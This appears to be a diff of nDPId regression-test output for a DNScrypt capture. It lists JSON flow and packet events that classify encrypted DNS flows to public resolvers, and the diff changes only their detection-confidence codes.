+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305350,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739660371,"flow_last_seen":946739660371,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739660371,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01240{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":946739660371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739660371,"pkt":"REREREREZmZmZmZmCABFAAJc6wNAAK8R\/JUKAAABwx5eHJ\/+IPsCSORQeRS+sjS2G7nK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDAyVmLtuOyOPrdbG9Aa84c6ABESOcWKO1lD0bmXASu6Lp1JrrhdSsrfi+qCLd+yV08wcBIOyOD3xWu+JqcvR+qyyD2wAqK+7GtNLfa5CYKvl4+qE+B8Fdcg3etmdvWho9v6RWRGqvWQ79X3lh7drodQ5tDBKL+haa6jK+KUocn+9wX11hwHxQkGR1McxgwheyWwiQ8yk86\/0X3FOuLzu\/q11WpJtGw+xpq\/OB+8OUVOD89R6Mnj\/UOcx7obvr0eYbF5A8onkaQEbT7AaiYRJQ+hA7ZZDi2ljxg+uDg1AUnD5AkpxvEvbz9buRkBehRmtAjmpjCb+1eSSGGy0pj3fWliJpufCy0cLqKeBAa8pN+PboX7ibcQKD2oLVDzOMCPNysRr7U4iSHLRzA3mGLlWv1wmtPqVLl\/EoRbf02Q+FQ\/4r6mOaMPxUziXWn4x9EAZfWAyRDD7Afeh1n3Kmrb8xH0TDb8AwH7WhW4050ZoDY8fwOoRj\/\/yicxCkUFPRn2\/1wmsWfaim9o7xstoH1TFkuOYolb5zL0b\/s+Q6LzmCI0CRhGzcGbTPbKaxkq5YwwG9Y4Y7yX3r23bemnved9GKHI+BB80yEb94yRK1wmhzXgZyDB626hQAGMFgeYF1jYBg8XUeiAWAkUeVdpaFQcCYu3RciaRBtQKGADb1WYqE\/SeWtKsrZLM+n2BJmC8O6wwHCEtXzUPi0rg"} 
00980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":946739660417,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":426,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":426,"pkt_l4_len":392,"thread_ts_msec":946739660417,"pkt":"ZmZmZmZmRERERERECABFAAGcN+1AADgRJ23DHl4cCgAAASD7n\/4BiHhncjZmbnZXajgMlZi7bjsjj63WxvRslmVw4ADDYw9Zf7rvWXePF7DzWlPhjWqgv8O9se2dHg\/hMkwpzbF\/IwWGmMmxEowkpKXdmkUibqvznKVpkcwGgbuuCaS7Y6VBAIjGo9kWj7NiKTrA6Y4suMJM1qQ00IXt9U3jt4cutk2V8vfwhRYcaNOhsYhZrStljarNU+tA0k9iIXbco1x+a3RzKSkOB\/31hiwlYARdPxVfA4tlw7PDeRv6xT+b+Zv+a+jVuxZiNAikFvbCic9wNteLeIi7n5SfaDU1hH5H0TBuxqIVG9IHOsQSrBqKpNMeo1qfha7yS2X+OJjDupJOcyA3aK4UBMnSr\/hwPHcnofH4+5e3N9vB71o19Y0N1Cu3OIZZTlMMscwt3XDJIpsNrPW0k\/KXOVig1xeZdDezEjIt7JmJY9nlO847+Hb404Ny9pRCt57zdrjCVnAEbkkF4phZwF7K\/zzTOwqW\/8CPNUPEe\/A1vTBCVo6HwXAA4OkIci3U"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":200000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946739660417,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":200000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946739660417,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739719617,"flow_last_seen":946739719617,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739719617,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":946739719617,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739719617,"pkt":"REREREREZmZmZmZmCABFAAJc7JNAALYR9AUKAAABwx5eHOmkIPsCSORQeRS+sjS2G7nK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDBMo9soY0c0\/zLwoUlxND\/bzQvpDiK25XnQMxT75lxBrJflDrZ3TYKCZk3StXCyTPG2FEGcG4hxHWTOmqcbZoIHiQGoGkoQihxo2BUKPI0pv0p51t1V26edh28hXvxxPPw7SntT7cr75g96KEBOTmpz8vKr2JtKP2b7u7k2V1lEcb4dyw8IiZpBWjdyNCmd3NDqhxitoMAdVDWaaN+p4NUnsh5LOnpcy+BudMvUiIPxrci+i2KL44M4RFazBU2s57RNqiqEv2bkqUCThU0SgEc9wzNR0FW71ZK4hudAWH8M3\/hAXcN9AewD\/AaJXRVgDGL0qn\/KRenrwTdCnxi6HDTa7amK+XsctsA25HOCRbRxeQJwScz6KcVEdK2TbQ7TCqCmGiDFCvYDXyDQlbjKYXmp0\/BJYjaZCnwrJp12tBAZ0x6OjhYZwAWscu0uhjPmD9iVirzPedIzLRyxaMWlLGePyHaAj4Or7sxUvict7D7E89\/0BkN8XtgG7lgmFT7zBoSzurlQ88vZsCNnKrFOvXYxZt2fBsVODLujNj\/tDQxfHRhSVCSuXN1WgXvmx8\/4SpEwOdjJ8GjGun7mZ2UfbnIj9QtUtWtJKU6mASD9XU0UWic8hmr4RcPHxhUnHJGAJ046xlUlER7NkMJm1TYibdKqask11nfPMpD0VjWYxoY7AOCRP0FnM2aYF37QqRyAsLBiMZsWdVVPm"} 
01029{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":946739719664,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":946739719664,"pkt":"ZmZmZmZmRERERERECABFAAG+RWVAADgRGdPDHl4cCgAAASD76aQBqqggcjZmbnZXajgTKPbKGNHNP8y8KFKW+XSruqbViU5UWiUSva7p4q\/AYRczDRsV3nci5xVTY3W7NmNbgWd95Wn1LHJZkVPpqTVw1qBPY5mArBhf+gRPUeOFfECdd+ofJDaoGOvOFyamxhIyROMRMgW5dPvOthc+oP4fRsaTLVk1jsGJhVCC8lL5C7WuKe4QsVCug6vlUb5MDgOey6PWAfheq6uh\/Wb6o6xCo9SsCbwnrsE4\/c3AnoD6VGu4z3OHcZv3Of85CH1fdBZtiEXJ14iGDgR0ySBqfwkfNqV\/amN09mhv37d8Bukwbh0NRB9ju6Oyp6QVJsBxuvpcLx3ia\/I19JcfBxIdSgYP2PNeqmV9aFF\/5i5eq\/gB2ziWHE3n4eWmdHy\/5HtzZoouaDQrjeTLDoGeRsyQ8AbAcbxTJeYc\/hyvjG0S4Dh4GFFMLk5QGrpOAQxsjlasHPCZNUlI6FaWbg9J6wj4UctB1m9PxGlOpLCTcjHtKT14QtT3C0e8B5m0\/g4kyAvL0ntLRf8vwUxpdglUbwcHEqyLa0eWST5dVlmaKw=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":200000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":946739719664,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":200000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":946739719664,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739720236,"flow_last_seen":946739720236,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739720236,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":946739720236,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739720236,"pkt":"REREREREZmZmZmZmCABFAAJcgJBAALYRD\/QKAAABMw8+QbCyAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDOvN3LKmlsKPJgnxHDgQO2HIwu\/7HgUbhvSQLUmgTButtVYZ7ynSLJeOyVR7apKprNCXG1CB6RzKxjyoWSQdDjHQSudtBqe8pb0jpoyikDKAP5jZsuhlLmSafeiWgv4b7FcEcaSLItWNKLNEkAAXUwpoLIVbFjTOnXrLtfp8ddH5RkIQz3yuUJ9Nr9mnfMn04Kowojf10wKowiddPU5KKVho7F0cvcKjFtvuttnCHTnagcxAyTEmIcCymyhGi+h9M4qiKb4nZlaO8w0zOAMAC1r78IGbvmw2MC\/y\/XFDrOtYAyDWcOnUil1BFM0d\/Bz+j1o\/P8xdWxuA8zW6LX70nyKPAmn2+XMm6v93oH0oPPpEb87KAvDSvCagsZZA4fpWnggw8IDtM+xGjIpanNsL2VG3CCZ8SJchr0dd0ybGZUr6\/QWXs1PQNuAQq7PtTY0h5VDncSKKbfMtAy3KYwk5hwtNLo5PMwSgkhumRRE888qSzJlQJGBNzGsf1NwJANZTAqrVJeK8b7f+2pTSgrru+nRtvffr5TCeW5qGtpkkXT1G87oaz4FH2RV1Xm1JIdrzicLRjoj866viGnjQ5b2\/UKZWoCT22+fKnqSPDxIXp73HamN35GQ751GknwXsyMVZZbtLrbqcV6TqrFj8sSTjExCJ80Zk2kq4s9KvTe8IudfZv2VZnKat7igdMc61peD9CbEijjtfZYoC"} 
00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":946739720266,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":946739720266,"pkt":"ZmZmZmZmRERERERECABFAAEM3XMAADURdWEzDz5BCgAAAQG7sLIA+HYgcjZmbnZXajjrzdyyppbCjyYJ8RwtW4RTIlvIG\/FZbH1Xp2LSeUte4yLE0KEYJIy\/W8+x\/FH3nQM381uStJPi54eYTbEiFOHb6+tNj6JfFejP8ANh9SW7+XztIQKHTMkKaKwDijmfQK3jWMvzYn5RQLy\/kgEd3jZcHSQ4+mGlJFAq0q9\/sxSmeRSE7Bf4lfghgGePrvRax2LVMOPyLQdEzOtXRcimFhC\/P2NV+z\/yC5UUyjWbNHflc5ZhEb6wjqEIWWaXMR9PmHFkJmX18vLk2mHCcaPJ0ISTpxtaV1D5IuKPIa2LIoH3gyFLk8kBlxy8"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739720266,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739720266,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739725845,"flow_last_seen":946739725845,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739725845,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":946739725845,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739725845,"pkt":"REREREREZmZmZmZmCABFAAJcg7xAALYRDMgKAAABMw8+QY+KAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDHgMkBVee38D+I7fnhBktgHf7os968\/qL0XkoqwhIpo2rKPzGWXe2G9NgFMScZ1tv4\/+yOWKKWYUUiUyLx+7PMrENy\/k+jN+yzdctk2Zo3FLcHvC79XH2TY1F0O7cJD1wjxZI3\/IHMcd6PNvU2hGrzF+GquS0c6mjapr0bbntYIeD4+Xf\/ITOco5AtKhdlLVR6qs44J9FD4+1MhlzKeOoRa6oiskDhR9SKCiLE0vY6WaFISx1KvaV1\/AWlTq+Ma\/RCIZcpIwRnCK5x9qtU8svtd3XmYK5sxwzMlT8VpdCDkudem2VmnpOeldtwd4GZeCkcdGXhDpTvkco7\/J7KzU8Em3dvt1ZFDy4TcFUOFTvtGhCNRYamvuZtqV1ariMFQakPC5kVsCG2gSYSztnSwq2hbNURFeBG0BsgQjYyNkq5wGuYsXMV6s23vt0COGB4x1t6Zn8jjY5lWn7t84BUSUEjxNSXlazc9hfUsGYBk1YNyvKVIOa4XVjl\/NR0vRtizEXbk8CW7UFlpZywbOaEBbweblLU4zywJ5qKZiL8sEsu9XT1G3qBmTW8cVYrUgsGb+gfIiskkKUwoOtt9RL+Teq82rqtdl6NJyjfa8lJ6hpSkFQGXkbcjp3VueVgKLzTUvGcLRMTp0C18n\/FNAt4vg0zRX0o3Lss4rXcLQ3ZMQHCelaCESW7C4sZpRGMwGTOa2B2AzD+kO+ZGd"} 
00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":946739725874,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":946739725874,"pkt":"ZmZmZmZmRERERERECABFAAEM4eEAADURcPMzDz5BCgAAAQG7j4oA+L7VcjZmbnZXajh4DJAVXnt\/A\/iO355MVB4P\/\/Rk8\/R8bJwvIdLtYy13W15OTi+Go1C5ARLPQjyVOYrIdtt78KeJtxqvLGMYFgf90WzBjkKY8vjgNB0MPV1q9fSbDPwYJMt9sDZnnX7J06DitoJz19fiGevmNqdw2iS+W0+hbeSiK8kirJT\/QpPdxVHp2xD743rTjnXejSHner\/lxnNhKbPdOrwzbBbFmJ\/STzN7we3lc\/L7tRfFce0lf4Dadw+FNCaY6kAAQ713YJ6hg1mApwixRpXpT16U0DoxmV6YKXf9KevXwY7CFTGcq9MsTSP1FQYE"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739725874,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739725874,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739727013,"flow_last_seen":946739727013,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739727013,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01233{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":946739727013,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739727013,"pkt":"REREREREZmZmZmZmCABFAAJchI5AALYRC\/YKAAABMw8+QYFBAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDAvLo+OTm36q6otOO+fGemzVvq0dD3jxm9VGAJSNGJ7CPJoGqXj8m9e0jdRInMcNRA9p4+0Ni8e31vogtljvbwYYgmhAZTxwGYs6C50cDQFt1uHfEvD15mlAq995eAVsOx9PzSthVaX\/ivHpOY6L3Ij\/Ef7SZJJCujYYFW73myi8HjWORk7BxBZfRqH+6sXHsTHW9JgIyfg81CrvoYmjj6eguA0dO39fTJaKjXzcpWKnEcMMNV4ml8LGnAy0T9PzW3di7md5aeCc6dVE4FKwEMVWCPhdhJoRf2eXkrqBw09LkEK01y9a7hl1hmtvIUWP7Fpi4bKoZT2dc0fFL1f9KzoS20B8JdI1HDtUFbfn9WkC6dXWkvGuh\/9+Rlymk6CKSLR0QVl5o+\/deX43CF3YmoxgH2snZah0gHUFwhHSA2MzyATzLiO4hwopOla7EXLAzrjJnmBpaFbHi1L+QqXQh2bLrcU+P9O4f9I6E21iw7CMaLWnshFHMR4k17Kr3eYvvp5nk3smnj6RkzbyXiwre7VxnxR8luWJiFKQAtgTS7iTP90QNwfWgaQbUtbBzkaFhJU0sLHhiOY7bVruAAJT6m3XAbRU\/eHVLtQFKfLcw5DBcGucce2S1ZsrhqHFcOTeV5s1bkuGYusFVrqTNERXk+qQd0EJRZ80ghllq3WCfjIbNz4NU54JpS6KXFVABPgeMm+7RrRRXRHV"} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":946739727039,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":946739727039,"pkt":"ZmZmZmZmRERERERECABFAADM4h4AADURcPYzDz5BCgAAAQG7gUEAuGT7cjZmbnZXajgLy6Pjk5t+quqLTjthMYRcpmrtygKi+8ge\/d5a\/EggfKFstwqlUcEQ0npRyt3o\/+nrMu7IyAemLvDGwM3nY6O0vBX25jf4NlD5NhKqGUUpFydrLINODy\/Et1yVVHUUL4VBz3CwT8bs4b54QwYXASMjQfnf\/0NTpkvJ+0v2f5ntIAM7o81gzx\/1ovB+r6k93kwem7LHnom40gyZk3GGiIOpwn\/P\/XOKwtE="} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739727039,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739727039,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 